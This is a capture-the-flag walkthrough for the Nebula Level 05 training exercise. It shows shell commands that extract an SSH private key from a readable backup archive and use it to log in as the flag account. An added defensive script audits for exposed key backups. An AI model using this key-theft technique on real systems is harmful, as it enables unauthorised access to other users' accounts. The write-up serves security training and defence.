Exploit Exercises: Nebula Level 05
Check the flag05 home directory. You are looking for weak directory permissions. To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level.
Solution
Of course we are going to log in and go to the flag account folder, but we will be surprised to see this!
level05@nebula:/home/flag05$ ls -al
total 5
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
Well, under our flag folder there is nothing obvious that we can use. Nada! Yet the flag is right under our nose. The best hint for this challenge is “You are looking for weak directory permissions”. So if we run this command:
level05@nebula:/home/flag05$ ls -lAh
total 5.0K
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3.3K May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
Or just this:
level05@nebula:/home/flag05$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
We can see a hidden folder called “.backup” with the permissions drwxr-xr-x, so anyone who can reach it can enter it and list its contents. Let’s see what is in it!
level05@nebula:/home/flag05/.backup$ tar -xzvf backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
.ssh/id_rsa.pub
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa.pub: Cannot open: No such file or directory
.ssh/id_rsa
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa: Cannot open: No such file or directory
.ssh/authorized_keys
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/authorized_keys: Cannot open: No such file or directory
tar: Exiting with failure status due to previous errors
level05@nebula:/home/flag05/.backup$ ls -al
total 2
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 ..
-rw-rw-r-- 1 flag05 flag05 1826 Nov 20 2011 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$
Uuuuuuuuuuuu, permission denied at the “tar -xzvf backup-19072011.tgz” command! The archive is readable, but we cannot write into .backup, so tar cannot create .ssh there. Let’s copy it to another folder that we control (~/ or /tmp) and extract the tgz there.
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~/
level05@nebula:/home/flag05/.backup$ cd ~/
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ ls -al
total 9
drwxr-x--- 1 level05 level05 80 Oct 18 12:43 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 level05 level05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 level05 level05 3353 May 18 2011 .bashrc
drwx------ 2 level05 level05 60 Oct 18 12:27 .cache
-rw-r--r-- 1 level05 level05 675 May 18 2011 .profile
drwx------ 2 level05 level05 3 Aug 27 2012 .ssh
-rw-rw-r-- 1 level05 level05 1826 Oct 18 12:43 backup-19072011.tgz
level05@nebula:~$ mkdir ./test
level05@nebula:~$ tar -xvzf backup-19072011.tgz -C ./test
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$
Fun time. I’ve seen people trying to get the SSH key and to find the password in order to connect to the flag account in order to execute getflag to finish the task.
You could try this also if you want to waste your time on this task.
level05@nebula:~/test/.ssh$ ls -al
total 12
drwxr-xr-x 2 level05 level05 100 Jul 19 2011 .
drwxrwxr-x 3 level05 level05 60 Oct 18 12:44 ..
-rw-r--r-- 1 level05 level05 394 Jul 19 2011 authorized_keys
-rw------- 1 level05 level05 1675 Jul 19 2011 id_rsa
-rw-r--r-- 1 level05 level05 394 Jul 19 2011 id_rsa.pub
level05@nebula:~/test/.ssh$ cat ./id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body removed]
-----END RSA PRIVATE KEY-----
level05@nebula:~/test/.ssh$
Or you could note that the .tgz file is called backup, so it might be a backup from this system, and that it could also store the keys and passwords for SSH. In other words:
level05@nebula:~/test/.ssh$ cp id_rsa /home/level05/.ssh/
level05@nebula:~/test/.ssh$ ssh flag05@192.168.0.101
    _   __     __          __
   / | / /__  / /_  __  __/ /___ _
  /  |/ / _ \/ __ \/ / / / / __ `/
 / /|  /  __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
flag05@nebula:~$
Yes, we do not need any password at all, just the SSH private key, since the system already trusts that key (the same backup carries the account's authorized_keys). Keep in mind: Be lazy!
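The same misconfiguration from the defender's side, as an added example that is not part of the original write-up: a shell audit that lists gzip-compressed tar archives readable by group or other whose contents include a private-key header. The function names and the sample tree are constructed for illustration; the "key" in the sample is a dummy header, not key material.

```shell
#!/bin/sh
# Added example: find backup archives that are group- or world-readable
# and contain SSH private-key material.

# Print every .tgz/.tar.gz under $1 whose mode grants read to group or
# other and whose members include a PEM/OpenSSH private-key header.
find_exposed_key_archives() {
    root=$1
    find "$root" -type f \
        \( -name '*.tgz' -o -name '*.tar.gz' \) \
        \( -perm -040 -o -perm -004 \) -print 2>/dev/null |
    while IFS= read -r archive; do
        # Stream members to stdout; nothing is extracted to disk.
        if tar -xzOf "$archive" 2>/dev/null |
           grep -aq -- '-----BEGIN [A-Z ]*PRIVATE KEY-----'; then
            printf '%s\n' "$archive"
        fi
    done
}

# Constructed sample tree mimicking the layout on this page: a readable
# .backup directory holding a tarball of .ssh, plus two controls.
make_sample_tree() {
    base=$(mktemp -d)
    mkdir -p "$base/src/.ssh" "$base/home/.backup" "$base/home/private"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED-DUMMY' \
        '-----END RSA PRIVATE KEY-----' > "$base/src/.ssh/id_rsa"
    echo 'just notes' > "$base/src/notes.txt"
    tar -czf "$base/home/.backup/backup-sample.tgz" -C "$base/src" .ssh
    tar -czf "$base/home/private/backup-locked.tgz" -C "$base/src" .ssh
    tar -czf "$base/home/.backup/notes.tgz" -C "$base/src" notes.txt
    chmod 664 "$base/home/.backup/backup-sample.tgz" \
              "$base/home/.backup/notes.tgz"
    chmod 600 "$base/home/private/backup-locked.tgz"   # owner-only control
    printf '%s\n' "$base"
}

# Demo run on the constructed tree: only backup-sample.tgz is reported.
sample=$(make_sample_tree)
find_exposed_key_archives "$sample/home"
rm -rf "$sample"
```

Tightening the archive to mode 600, or keeping key backups out of home directories that other accounts can traverse, removes it from the report.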